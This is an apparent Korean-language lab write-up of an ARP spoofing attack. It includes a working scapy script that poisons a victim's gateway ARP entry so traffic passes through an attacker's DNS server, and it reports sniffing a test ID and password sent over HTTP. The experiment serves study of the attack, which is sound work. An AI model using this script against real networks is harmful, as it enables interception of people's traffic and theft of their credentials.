ARP Spooping 공격 기법 - 3(ARP redirection sniffing with dns)

- 실험 과정

희생자의 arp cache table에서 기본 게이트웨이 MAC 주소를 공격자가 만든 dns 서버의 MAC 주소로 주고 스니핑을 해보겠습니다.

 

- 실험 구성

공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1

희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05

공격자의 dns : centos 192.168.219.100,  00:0C:29:CD:9A:77

 

- 실험 전

<DNS 서버 구동>

잘 실행되고 있는지 확인해보겠습니다.

잘 실행됨을 알 수 있습니다.

 

<dns 서버 와이어샤크 구동>

 

<파이썬 코드 변경>

from scapy.all import *
import time

# ARP 응답 패킷 생성
arp_reply = Ether(dst='00:0C:29:8C:2E:05')/ARP(op='is-at', hwsrc='00:0C:29:CD:9A:77', psrc='192.168.219.1', hwdst='00:0C:29:8C:2E:05', pdst='192.168.219.120')

# 패킷 전송 10번
for i in range(0, 100):
    sendp(arp_reply)
    time.sleep(2)
    print("패킷 전송 완료")

 

- 실험 시작

<공격전>

<공격>

<공격후>

<희생자 웹사이트 열기>

잘열립니다.

 

<공격자의 dns 서버 와이어샤크 분석>

희생자 http 프로토콜 사용하는 사이트 접속후 아이디에 test, 비밀번호에 test1234 입력합니다.

실제 dns 서버에서 mb_id, mb_password 항목으로 희생자가 입력한 아이디와 패스워드 스니핑이 가능함을 확인했습니다.

 

- 결론

ARP Spooping 공격으로 희생자의 기본 게이트웨이 ARP cache table을 공격자의 dns서버(실제 구동되는) MAC 주소로 두게되면, 스니핑이 가능합니다.

 

- 의문점

Q. IP는 안바꾸고 MAC만 바꿧는데도 스니핑이 가능한 이유는 뭘까요?

A. 로컬 네트워크 영역에서는 IP보다 MAC이 우선순위가 높기때문입니다. 더 자세히 말하면 로컬 네트워크 영역에서 스위치는 MAC으로 내보낼 포트를 결정합니다. 따라서 MAC만 변경해도 로컬 네트워크 영역안이라면 스니핑이 가능한 것 입니다.